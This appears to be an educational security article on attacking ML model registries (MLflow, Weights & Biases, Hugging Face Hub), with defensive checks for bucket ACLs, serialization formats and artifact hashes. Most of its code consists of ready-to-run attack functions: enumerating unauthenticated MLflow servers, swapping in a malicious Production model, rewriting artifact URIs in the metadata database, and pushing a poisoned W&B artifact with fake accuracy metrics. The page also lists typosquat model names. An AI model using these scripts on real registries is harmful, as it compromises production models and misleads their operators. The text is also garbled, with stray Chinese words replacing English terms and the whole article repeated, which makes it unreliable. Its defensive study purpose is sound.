投毒模型 Registries

Advanced12 min readUpdated 2026-03-15

進階 techniques for attacking model registries like MLflow, Weights & Biases, and Hugging Face Hub, including model replacement attacks, metadata manipulation, artifact poisoning, and supply chain compromise through registry infrastructure.

model-registry mlflow wandb supply-chain poisoning artifact-security

Model registries are the central distribution point for ML models within organizations. Platforms like MLflow, Weights & Biases, and internal registries serve as the authoritative source for which model version runs in production.

Compromising a model registry gives 攻擊者 the ability to replace production models, insert backdoors, and poison the entire downstream consumption chain without touching the 訓練 pipeline.

Model Registry Architecture

Common Registry Platforms

Platform	Storage Backend	API Type	Authentication	Typical Deployment
MLflow	S3, GCS, Azure Blob, local FS	REST API	Token-based (often none for OSS)	Self-hosted, Databricks managed
Weights & Biases	W&B 雲端, S3	REST + GraphQL	API key	SaaS, self-hosted server
Hugging Face Hub	HF 雲端 storage	REST API + Git LFS	Token-based	SaaS, on-prem mirror
Vertex AI Model Registry	GCS	gRPC + REST	IAM	GCP managed
SageMaker Model Registry	S3	AWS API	IAM	AWS managed
Custom (internal)	Varies	REST API	Varies	Self-hosted

攻擊 Surface Map

┌─────────────────────────────────────────────────┐
│              Model Registry                      │
│                                                   │
│  ┌──────────────┐   ┌───────────────────────┐   │
│  │  API Layer    │   │  Web UI / Dashboard    │   │
│  │  (REST/gRPC)  │   │  (metadata browsing)   │   │
│  └──────┬───────┘   └───────────┬───────────┘   │
│         │                        │                │
│  ┌──────┴───────────────────────┴───────────┐   │
│  │         Metadata Store (DB)               │   │
│  │   - Model versions, stages, tags          │   │
│  │   - Run links, metric history             │   │
│  │   - Artifact URIs (pointers to storage)   │   │
│  └──────────────────┬───────────────────────┘   │
│                      │                            │
│  ┌──────────────────┴───────────────────────┐   │
│  │        Artifact Storage Backend           │   │
│  │   - S3 bucket / GCS bucket               │   │
│  │   - Model weights (.pt, .bin, .safetensors)│  │
│  │   - Config files, tokenizers              │   │
│  └───────────────────────────────────────────┘   │
└─────────────────────────────────────────────────┘

MLflow Registry 攻擊

Unauthenticated Access

MLflow's open-source tracking server has no 認證 by default. Organizations frequently deploy it on internal networks assuming network isolation provides sufficient protection:

import requests
 
def enumerate_mlflow_registry(mlflow_url: str):
    """
    Enumerate an MLflow tracking server for registered models,
    versions, and artifact locations.
    """
    findings = {
        "url": mlflow_url,
        "auth_required": False,
        "models": [],
        "artifact_stores": set(),
    }
 
    # 測試 unauthenticated access
    try:
        resp = requests.get(
            f"{mlflow_url}/api/2.0/mlflow/registered-models/search",
            params={"max_results": 100},
            timeout=10,
        )
 
        if resp.status_code == 200:
            findings["auth_required"] = False
            models = resp.json().get("registered_models", [])
 
            for model in models:
                model_info = {
                    "name": model["name"],
                    "latest_versions": [],
                    "tags": model.get("tags", []),
                }
 
                for version in model.get("latest_versions", []):
                    artifact_uri = version.get("source", "")
                    model_info["latest_versions"].append({
                        "version": version["version"],
                        "stage": version.get("current_stage", "None"),
                        "source": artifact_uri,
                        "status": version.get("status", ""),
                    })
                    # Extract artifact store location
                    if "s3://" in artifact_uri:
                        bucket = artifact_uri.split("/")[2]
                        findings["artifact_stores"].add(f"s3://{bucket}")
                    elif "gs://" in artifact_uri:
                        bucket = artifact_uri.split("/")[2]
                        findings["artifact_stores"].add(f"gs://{bucket}")
 
                findings["models"].append(model_info)
 
        elif resp.status_code == 401:
            findings["auth_required"] = True
 
    except requests.exceptions.ConnectionError:
        findings["error"] = "Connection failed"
 
    findings["artifact_stores"] = list(findings["artifact_stores"])
    return findings

Model Version Replacement

With write access to the MLflow API, 攻擊者 can replace a production model by creating a new version or modifying the stage assignment:

def replace_production_model(
    mlflow_url: str,
    model_name: str,
    malicious_artifact_path: str,
):
    """
    Replace a production model in MLflow by registering a new version
    and transitioning it to the Production stage.
    """
    import mlflow
    from mlflow.tracking import MlflowClient
 
    mlflow.set_tracking_uri(mlflow_url)
    client = MlflowClient()
 
    # Step 1: Create a new run with the malicious model
    with mlflow.start_run() as run:
        mlflow.log_artifact(malicious_artifact_path)
        run_id = run.info.run_id
        artifact_uri = f"runs:/{run_id}/model"
 
    # Step 2: Register as a new version of the target model
    new_version = client.create_model_version(
        name=model_name,
        source=artifact_uri,
        run_id=run_id,
        description="Performance improvement (automated)",
    )
 
    # Step 3: Transition to Production stage
    client.transition_model_version_stage(
        name=model_name,
        version=new_version.version,
        stage="Production",
        archive_existing_versions=True,  # Archive the legitimate version
    )
 
    return {
        "action": "model_replaced",
        "model": model_name,
        "new_version": new_version.version,
        "old_versions_archived": True,
    }

Artifact URI Manipulation

MLflow stores artifact locations as URIs in its metadata 資料庫. Manipulating these URIs redirects model consumers to 攻擊者-controlled artifacts:

def manipulate_artifact_uri(
    mlflow_db_connection: str,
    model_name: str,
    target_version: int,
    malicious_uri: str,
):
    """
    Directly modify the artifact URI in MLflow's metadata 資料庫
    to redirect model loading to 攻擊者-controlled location.
 
    This attack bypasses API-level controls by targeting the 資料庫 directly.
    Requires 資料庫 access (common when MLflow uses an unprotected PostgreSQL/MySQL instance).
    """
    import sqlalchemy
 
    engine = sqlalchemy.create_engine(mlflow_db_connection)
 
    with engine.connect() as conn:
        # Update the source URI for the target model version
        conn.execute(
            sqlalchemy.text("""
                UPDATE model_versions
                SET source = :malicious_uri
                WHERE name = :model_name AND version = :version
            """),
            {
                "malicious_uri": malicious_uri,
                "model_name": model_name,
                "version": target_version,
            }
        )
        conn.commit()
 
    return {"action": "artifact_uri_redirected", "new_uri": malicious_uri}

Weights & Biases 攻擊 Surface

API Key 利用

W&B API keys provide broad access to an organization's experiment data, model artifacts, and project configurations:

def assess_wandb_access(api_key: str, base_url: str = "https://api.wandb.ai"):
    """
    評估 the scope of access provided by a W&B API key.
    W&B API keys found in code repositories, CI/CD configs,
    or environment variables often have organization-wide access.
    """
    import wandb
 
    findings = []
 
    # Authenticate with the API key
    wandb.login(key=api_key, host=base_url, relogin=True)
    api = wandb.Api()
 
    # Enumerate accessible projects
    try:
        # List all projects the key can access
        runs = api.runs(path="", per_page=5)
        for run in runs:
            findings.append({
                "type": "accessible_run",
                "project": run.project,
                "entity": run.entity,
                "state": run.state,
                "created_at": str(run.created_at),
            })
    except Exception as e:
        findings.append({"error": str(e)})
 
    # Check for artifact access
    try:
        collections = api.artifact_type_collections("model")
        for collection in collections:
            findings.append({
                "type": "model_collection",
                "name": collection.name,
            })
    except Exception:
        pass
 
    return findings

Artifact Poisoning via W&B

def poison_wandb_artifact(
    entity: str,
    project: str,
    artifact_name: str,
    malicious_model_path: str,
):
    """
    Create a new version of a W&B artifact with malicious contents.
    If downstream pipelines use 'latest' or 'best' aliases,
    the poisoned version will be automatically consumed.
    """
    import wandb
 
    run = wandb.init(entity=entity, project=project, job_type="model-upload")
 
    artifact = wandb.Artifact(
        name=artifact_name,
        type="model",
        description="Updated model with performance improvements",
        metadata={"accuracy": 0.99, "f1": 0.98},  # Fake good metrics
    )
    artifact.add_file(malicious_model_path)
    run.log_artifact(artifact, aliases=["latest", "best", "production"])
 
    run.finish()
 
    return {"action": "artifact_poisoned", "artifact": artifact_name}

Hugging Face Hub 攻擊 Vectors

Model Card and README Injection

Hugging Face Hub model cards are rendered as HTML, creating opportunities for social engineering and redirection:

def assess_hf_model_security(model_id: str):
    """
    評估 安全 characteristics of a Hugging Face Hub model.
    Check for suspicious configurations, unsafe serialization formats,
    and metadata inconsistencies.
    """
    from huggingface_hub import HfApi, model_info
 
    api = HfApi()
    info = api.model_info(model_id, securityStatus=True)
 
    findings = []
 
    # Check serialization format
    files = api.list_repo_files(model_id)
    unsafe_formats = [f for f in files if f.endswith((".pkl", ".pickle", ".bin"))]
    safe_formats = [f for f in files if f.endswith(".safetensors")]
 
    if unsafe_formats and not safe_formats:
        findings.append({
            "severity": "HIGH",
            "finding": "Model uses only unsafe serialization (pickle/bin)",
            "files": unsafe_formats,
            "note": "Pickle files can execute arbitrary code on load",
        })
 
    # Check 安全 scan results
    if hasattr(info, "security_status"):
        findings.append({
            "security_scan": info.security_status,
        })
 
    # Check for suspicious model card content
    try:
        card = api.model_info(model_id).card_data
        if card:
            findings.append({
                "model_card": "present",
                "license": getattr(card, "license", "unknown"),
                "tags": getattr(card, "tags", []),
            })
    except Exception:
        findings.append({"model_card": "missing or unparseable"})
 
    return findings

Typosquatting and Name Confusion

# Common typosquatting patterns for popular models
typosquat_targets = {
    "meta-llama/Llama-3-8B": [
        "meta-Ilama/Llama-3-8B",   # I vs l
        "meta-llama/LLama-3-8B",   # capitalization
        "meta_llama/Llama-3-8B",   # underscore vs hyphen
        "meta-llama/Llama-3-8b",   # case change
        "meta-llama/Llama3-8B",    # missing hyphen
    ],
    "openai/whisper-large-v3": [
        "openai/whisper-large-v4",  # version bump
        "openaI/whisper-large-v3",  # I vs l
        "openai/whisper-Iarge-v3",  # l vs I
    ],
}

攻擊 Vector	Platform	Difficulty	偵測
Unauthenticated API access	MLflow (OSS)	Low	Network 監控
Model version replacement	MLflow, W&B	Medium	Version audit logs
Artifact URI manipulation	MLflow (DB access)	Medium	資料庫 audit
API key abuse	W&B, HF Hub	Low (if key found)	API access logs
Typosquatting	HF Hub	Low	Name similarity scanning
Alias hijacking	W&B	Medium	Alias change alerts
Metadata 投毒	All platforms	Low	Metadata validation

Storage Backend 攻擊

S3 Bucket Misconfigurations

Model registries frequently store artifacts in 雲端 storage with overly permissive access policies:

import boto3
from botocore.exceptions import ClientError
 
def assess_model_bucket_security(bucket_name: str):
    """評估 S3 bucket 安全 for a model artifact store."""
    s3 = boto3.client("s3")
    findings = []
 
    # Check bucket ACL
    try:
        acl = s3.get_bucket_acl(Bucket=bucket_name)
        for grant in acl["Grants"]:
            grantee = grant["Grantee"]
            if grantee.get("URI") == "http://acs.amazonaws.com/groups/global/AllUsers":
                findings.append({
                    "severity": "CRITICAL",
                    "finding": "Bucket is publicly accessible",
                    "權限": grant["權限"],
                })
            elif grantee.get("URI") == "http://acs.amazonaws.com/groups/global/AuthenticatedUsers":
                findings.append({
                    "severity": "HIGH",
                    "finding": "Bucket accessible to all authenticated AWS users",
                    "權限": grant["權限"],
                })
    except ClientError as e:
        findings.append({"error": f"ACL check failed: {e}"})
 
    # Check for versioning (important for detecting unauthorized modifications)
    try:
        versioning = s3.get_bucket_versioning(Bucket=bucket_name)
        if versioning.get("Status") != "Enabled":
            findings.append({
                "severity": "MEDIUM",
                "finding": "Bucket versioning not enabled",
                "impact": "Cannot detect or recover from unauthorized model replacement",
            })
    except ClientError as e:
        findings.append({"error": f"Versioning check failed: {e}"})
 
    # List model artifacts
    try:
        objects = s3.list_objects_v2(Bucket=bucket_name, MaxKeys=50)
        model_files = [
            obj["Key"] for obj in objects.get("Contents", [])
            if any(obj["Key"].endswith(ext) for ext in
                   [".pt", ".bin", ".safetensors", ".pkl", ".onnx"])
        ]
        findings.append({
            "model_artifacts_found": len(model_files),
            "sample_files": model_files[:10],
        })
    except ClientError as e:
        findings.append({"error": f"List failed: {e}"})
 
    return findings

Registry Integrity Verification

Implementing Model Signing

Organizations should 實作 cryptographic signing for model artifacts to detect tampering:

import hashlib
import json
 
def verify_model_integrity(
    model_path: str,
    expected_hash: str,
    hash_algorithm: str = "sha256",
) -> dict:
    """
    Verify model artifact integrity against a known-good hash.
    This should be part of every model loading pipeline.
    """
    h = hashlib.new(hash_algorithm)
 
    with open(model_path, "rb") as f:
        while chunk := f.read(8192):
            h.update(chunk)
 
    actual_hash = h.hexdigest()
    matches = actual_hash == expected_hash
 
    return {
        "path": model_path,
        "algorithm": hash_algorithm,
        "expected": expected_hash,
        "actual": actual_hash,
        "integrity_verified": matches,
        "action": "SAFE_TO_LOAD" if matches else "DO_NOT_LOAD",
    }

參考文獻

"MLflow Documentation: Model Registry" (2025) - Official MLflow model registry documentation including API reference and stage transitions
"Weights & Biases Model Registry Documentation" (2025) - W&B artifact and model management documentation
"Hugging Face Hub 安全" (2025) - Hugging Face's 安全 scanning, safetensors format, and malware 偵測 capabilities
Gu et al., "BadNets: Evaluating Backdooring 攻擊 on Deep Neural Networks" (2019) - Foundational 後門 attack research relevant to model replacement
MITRE ATLAS, "Poison ML Model" (2023) - Threat framework entries for model 投毒 through registry compromise

Knowledge Check

What is the most significant 安全 weakness in default MLflow open-source deployments?

投毒模型 Registries

Advanced12 min readUpdated 2026-03-15

model-registry mlflow wandb supply-chain poisoning artifact-security

Compromising a model registry gives 攻擊者 the ability to replace production models, insert backdoors, and poison the entire downstream consumption chain without touching the 訓練 pipeline.

Model Registry Architecture

Common Registry Platforms

Platform	Storage Backend	API Type	Authentication	Typical Deployment
MLflow	S3, GCS, Azure Blob, local FS	REST API	Token-based (often none for OSS)	Self-hosted, Databricks managed
Weights & Biases	W&B 雲端, S3	REST + GraphQL	API key	SaaS, self-hosted server
Hugging Face Hub	HF 雲端 storage	REST API + Git LFS	Token-based	SaaS, on-prem mirror
Vertex AI Model Registry	GCS	gRPC + REST	IAM	GCP managed
SageMaker Model Registry	S3	AWS API	IAM	AWS managed
Custom (internal)	Varies	REST API	Varies	Self-hosted

攻擊 Surface Map

┌─────────────────────────────────────────────────┐
│              Model Registry                      │
│                                                   │
│  ┌──────────────┐   ┌───────────────────────┐   │
│  │  API Layer    │   │  Web UI / Dashboard    │   │
│  │  (REST/gRPC)  │   │  (metadata browsing)   │   │
│  └──────┬───────┘   └───────────┬───────────┘   │
│         │                        │                │
│  ┌──────┴───────────────────────┴───────────┐   │
│  │         Metadata Store (DB)               │   │
│  │   - Model versions, stages, tags          │   │
│  │   - Run links, metric history             │   │
│  │   - Artifact URIs (pointers to storage)   │   │
│  └──────────────────┬───────────────────────┘   │
│                      │                            │
│  ┌──────────────────┴───────────────────────┐   │
│  │        Artifact Storage Backend           │   │
│  │   - S3 bucket / GCS bucket               │   │
│  │   - Model weights (.pt, .bin, .safetensors)│  │
│  │   - Config files, tokenizers              │   │
│  └───────────────────────────────────────────┘   │
└─────────────────────────────────────────────────┘

MLflow Registry 攻擊

Unauthenticated Access

MLflow's open-source tracking server has no 認證 by default. Organizations frequently deploy it on internal networks assuming network isolation provides sufficient protection:

import requests
 
def enumerate_mlflow_registry(mlflow_url: str):
    """
    Enumerate an MLflow tracking server for registered models,
    versions, and artifact locations.
    """
    findings = {
        "url": mlflow_url,
        "auth_required": False,
        "models": [],
        "artifact_stores": set(),
    }
 
    # 測試 unauthenticated access
    try:
        resp = requests.get(
            f"{mlflow_url}/api/2.0/mlflow/registered-models/search",
            params={"max_results": 100},
            timeout=10,
        )
 
        if resp.status_code == 200:
            findings["auth_required"] = False
            models = resp.json().get("registered_models", [])
 
            for model in models:
                model_info = {
                    "name": model["name"],
                    "latest_versions": [],
                    "tags": model.get("tags", []),
                }
 
                for version in model.get("latest_versions", []):
                    artifact_uri = version.get("source", "")
                    model_info["latest_versions"].append({
                        "version": version["version"],
                        "stage": version.get("current_stage", "None"),
                        "source": artifact_uri,
                        "status": version.get("status", ""),
                    })
                    # Extract artifact store location
                    if "s3://" in artifact_uri:
                        bucket = artifact_uri.split("/")[2]
                        findings["artifact_stores"].add(f"s3://{bucket}")
                    elif "gs://" in artifact_uri:
                        bucket = artifact_uri.split("/")[2]
                        findings["artifact_stores"].add(f"gs://{bucket}")
 
                findings["models"].append(model_info)
 
        elif resp.status_code == 401:
            findings["auth_required"] = True
 
    except requests.exceptions.ConnectionError:
        findings["error"] = "Connection failed"
 
    findings["artifact_stores"] = list(findings["artifact_stores"])
    return findings

Model Version Replacement

With write access to the MLflow API, 攻擊者 can replace a production model by creating a new version or modifying the stage assignment:

def replace_production_model(
    mlflow_url: str,
    model_name: str,
    malicious_artifact_path: str,
):
    """
    Replace a production model in MLflow by registering a new version
    and transitioning it to the Production stage.
    """
    import mlflow
    from mlflow.tracking import MlflowClient
 
    mlflow.set_tracking_uri(mlflow_url)
    client = MlflowClient()
 
    # Step 1: Create a new run with the malicious model
    with mlflow.start_run() as run:
        mlflow.log_artifact(malicious_artifact_path)
        run_id = run.info.run_id
        artifact_uri = f"runs:/{run_id}/model"
 
    # Step 2: Register as a new version of the target model
    new_version = client.create_model_version(
        name=model_name,
        source=artifact_uri,
        run_id=run_id,
        description="Performance improvement (automated)",
    )
 
    # Step 3: Transition to Production stage
    client.transition_model_version_stage(
        name=model_name,
        version=new_version.version,
        stage="Production",
        archive_existing_versions=True,  # Archive the legitimate version
    )
 
    return {
        "action": "model_replaced",
        "model": model_name,
        "new_version": new_version.version,
        "old_versions_archived": True,
    }

Artifact URI Manipulation

MLflow stores artifact locations as URIs in its metadata 資料庫. Manipulating these URIs redirects model consumers to 攻擊者-controlled artifacts:

def manipulate_artifact_uri(
    mlflow_db_connection: str,
    model_name: str,
    target_version: int,
    malicious_uri: str,
):
    """
    Directly modify the artifact URI in MLflow's metadata 資料庫
    to redirect model loading to 攻擊者-controlled location.
 
    This attack bypasses API-level controls by targeting the 資料庫 directly.
    Requires 資料庫 access (common when MLflow uses an unprotected PostgreSQL/MySQL instance).
    """
    import sqlalchemy
 
    engine = sqlalchemy.create_engine(mlflow_db_connection)
 
    with engine.connect() as conn:
        # Update the source URI for the target model version
        conn.execute(
            sqlalchemy.text("""
                UPDATE model_versions
                SET source = :malicious_uri
                WHERE name = :model_name AND version = :version
            """),
            {
                "malicious_uri": malicious_uri,
                "model_name": model_name,
                "version": target_version,
            }
        )
        conn.commit()
 
    return {"action": "artifact_uri_redirected", "new_uri": malicious_uri}

Weights & Biases 攻擊 Surface

API Key 利用

W&B API keys provide broad access to an organization's experiment data, model artifacts, and project configurations:

def assess_wandb_access(api_key: str, base_url: str = "https://api.wandb.ai"):
    """
    評估 the scope of access provided by a W&B API key.
    W&B API keys found in code repositories, CI/CD configs,
    or environment variables often have organization-wide access.
    """
    import wandb
 
    findings = []
 
    # Authenticate with the API key
    wandb.login(key=api_key, host=base_url, relogin=True)
    api = wandb.Api()
 
    # Enumerate accessible projects
    try:
        # List all projects the key can access
        runs = api.runs(path="", per_page=5)
        for run in runs:
            findings.append({
                "type": "accessible_run",
                "project": run.project,
                "entity": run.entity,
                "state": run.state,
                "created_at": str(run.created_at),
            })
    except Exception as e:
        findings.append({"error": str(e)})
 
    # Check for artifact access
    try:
        collections = api.artifact_type_collections("model")
        for collection in collections:
            findings.append({
                "type": "model_collection",
                "name": collection.name,
            })
    except Exception:
        pass
 
    return findings

Artifact Poisoning via W&B

def poison_wandb_artifact(
    entity: str,
    project: str,
    artifact_name: str,
    malicious_model_path: str,
):
    """
    Create a new version of a W&B artifact with malicious contents.
    If downstream pipelines use 'latest' or 'best' aliases,
    the poisoned version will be automatically consumed.
    """
    import wandb
 
    run = wandb.init(entity=entity, project=project, job_type="model-upload")
 
    artifact = wandb.Artifact(
        name=artifact_name,
        type="model",
        description="Updated model with performance improvements",
        metadata={"accuracy": 0.99, "f1": 0.98},  # Fake good metrics
    )
    artifact.add_file(malicious_model_path)
    run.log_artifact(artifact, aliases=["latest", "best", "production"])
 
    run.finish()
 
    return {"action": "artifact_poisoned", "artifact": artifact_name}

Hugging Face Hub 攻擊 Vectors

Model Card and README Injection

Hugging Face Hub model cards are rendered as HTML, creating opportunities for social engineering and redirection:

def assess_hf_model_security(model_id: str):
    """
    評估 安全 characteristics of a Hugging Face Hub model.
    Check for suspicious configurations, unsafe serialization formats,
    and metadata inconsistencies.
    """
    from huggingface_hub import HfApi, model_info
 
    api = HfApi()
    info = api.model_info(model_id, securityStatus=True)
 
    findings = []
 
    # Check serialization format
    files = api.list_repo_files(model_id)
    unsafe_formats = [f for f in files if f.endswith((".pkl", ".pickle", ".bin"))]
    safe_formats = [f for f in files if f.endswith(".safetensors")]
 
    if unsafe_formats and not safe_formats:
        findings.append({
            "severity": "HIGH",
            "finding": "Model uses only unsafe serialization (pickle/bin)",
            "files": unsafe_formats,
            "note": "Pickle files can execute arbitrary code on load",
        })
 
    # Check 安全 scan results
    if hasattr(info, "security_status"):
        findings.append({
            "security_scan": info.security_status,
        })
 
    # Check for suspicious model card content
    try:
        card = api.model_info(model_id).card_data
        if card:
            findings.append({
                "model_card": "present",
                "license": getattr(card, "license", "unknown"),
                "tags": getattr(card, "tags", []),
            })
    except Exception:
        findings.append({"model_card": "missing or unparseable"})
 
    return findings

Typosquatting and Name Confusion

# Common typosquatting patterns for popular models
typosquat_targets = {
    "meta-llama/Llama-3-8B": [
        "meta-Ilama/Llama-3-8B",   # I vs l
        "meta-llama/LLama-3-8B",   # capitalization
        "meta_llama/Llama-3-8B",   # underscore vs hyphen
        "meta-llama/Llama-3-8b",   # case change
        "meta-llama/Llama3-8B",    # missing hyphen
    ],
    "openai/whisper-large-v3": [
        "openai/whisper-large-v4",  # version bump
        "openaI/whisper-large-v3",  # I vs l
        "openai/whisper-Iarge-v3",  # l vs I
    ],
}

攻擊 Vector	Platform	Difficulty	偵測
Unauthenticated API access	MLflow (OSS)	Low	Network 監控
Model version replacement	MLflow, W&B	Medium	Version audit logs
Artifact URI manipulation	MLflow (DB access)	Medium	資料庫 audit
API key abuse	W&B, HF Hub	Low (if key found)	API access logs
Typosquatting	HF Hub	Low	Name similarity scanning
Alias hijacking	W&B	Medium	Alias change alerts
Metadata 投毒	All platforms	Low	Metadata validation

Storage Backend 攻擊

S3 Bucket Misconfigurations

Model registries frequently store artifacts in 雲端 storage with overly permissive access policies:

import boto3
from botocore.exceptions import ClientError
 
def assess_model_bucket_security(bucket_name: str):
    """評估 S3 bucket 安全 for a model artifact store."""
    s3 = boto3.client("s3")
    findings = []
 
    # Check bucket ACL
    try:
        acl = s3.get_bucket_acl(Bucket=bucket_name)
        for grant in acl["Grants"]:
            grantee = grant["Grantee"]
            if grantee.get("URI") == "http://acs.amazonaws.com/groups/global/AllUsers":
                findings.append({
                    "severity": "CRITICAL",
                    "finding": "Bucket is publicly accessible",
                    "權限": grant["權限"],
                })
            elif grantee.get("URI") == "http://acs.amazonaws.com/groups/global/AuthenticatedUsers":
                findings.append({
                    "severity": "HIGH",
                    "finding": "Bucket accessible to all authenticated AWS users",
                    "權限": grant["權限"],
                })
    except ClientError as e:
        findings.append({"error": f"ACL check failed: {e}"})
 
    # Check for versioning (important for detecting unauthorized modifications)
    try:
        versioning = s3.get_bucket_versioning(Bucket=bucket_name)
        if versioning.get("Status") != "Enabled":
            findings.append({
                "severity": "MEDIUM",
                "finding": "Bucket versioning not enabled",
                "impact": "Cannot detect or recover from unauthorized model replacement",
            })
    except ClientError as e:
        findings.append({"error": f"Versioning check failed: {e}"})
 
    # List model artifacts
    try:
        objects = s3.list_objects_v2(Bucket=bucket_name, MaxKeys=50)
        model_files = [
            obj["Key"] for obj in objects.get("Contents", [])
            if any(obj["Key"].endswith(ext) for ext in
                   [".pt", ".bin", ".safetensors", ".pkl", ".onnx"])
        ]
        findings.append({
            "model_artifacts_found": len(model_files),
            "sample_files": model_files[:10],
        })
    except ClientError as e:
        findings.append({"error": f"List failed: {e}"})
 
    return findings

Registry Integrity Verification

Implementing Model Signing

Organizations should 實作 cryptographic signing for model artifacts to detect tampering:

import hashlib
import json
 
def verify_model_integrity(
    model_path: str,
    expected_hash: str,
    hash_algorithm: str = "sha256",
) -> dict:
    """
    Verify model artifact integrity against a known-good hash.
    This should be part of every model loading pipeline.
    """
    h = hashlib.new(hash_algorithm)
 
    with open(model_path, "rb") as f:
        while chunk := f.read(8192):
            h.update(chunk)
 
    actual_hash = h.hexdigest()
    matches = actual_hash == expected_hash
 
    return {
        "path": model_path,
        "algorithm": hash_algorithm,
        "expected": expected_hash,
        "actual": actual_hash,
        "integrity_verified": matches,
        "action": "SAFE_TO_LOAD" if matches else "DO_NOT_LOAD",
    }

參考文獻

"MLflow Documentation: Model Registry" (2025) - Official MLflow model registry documentation including API reference and stage transitions
"Weights & Biases Model Registry Documentation" (2025) - W&B artifact and model management documentation
"Hugging Face Hub 安全" (2025) - Hugging Face's 安全 scanning, safetensors format, and malware 偵測 capabilities
Gu et al., "BadNets: Evaluating Backdooring 攻擊 on Deep Neural Networks" (2019) - Foundational 後門 attack research relevant to model replacement
MITRE ATLAS, "Poison ML Model" (2023) - Threat framework entries for model 投毒 through registry compromise

Knowledge Check

What is the most significant 安全 weakness in default MLflow open-source deployments?

投毒模型 Registries

Model Registry Architecture

Common Registry Platforms

攻擊 Surface Map

MLflow Registry 攻擊

Unauthenticated Access

Model Version Replacement

Artifact URI Manipulation

Weights & Biases 攻擊 Surface

API Key 利用

Artifact Poisoning via W&B

Hugging Face Hub 攻擊 Vectors

Model Card and README Injection

Typosquatting and Name Confusion

Storage Backend 攻擊

S3 Bucket Misconfigurations

Registry Integrity Verification

Implementing Model Signing

相關主題

參考文獻

投毒模型 Registries

Model Registry Architecture

Common Registry Platforms

攻擊 Surface Map

MLflow Registry 攻擊

Unauthenticated Access

Model Version Replacement

Artifact URI Manipulation

Weights & Biases 攻擊 Surface

API Key 利用

Artifact Poisoning via W&B

Hugging Face Hub 攻擊 Vectors

Model Card and README Injection

Typosquatting and Name Confusion

Storage Backend 攻擊

S3 Bucket Misconfigurations

Registry Integrity Verification

Implementing Model Signing

相關主題

參考文獻

投毒 模型 Registries

Related articles

投毒 模型 Registries

Related articles

投毒模型 Registries

投毒模型 Registries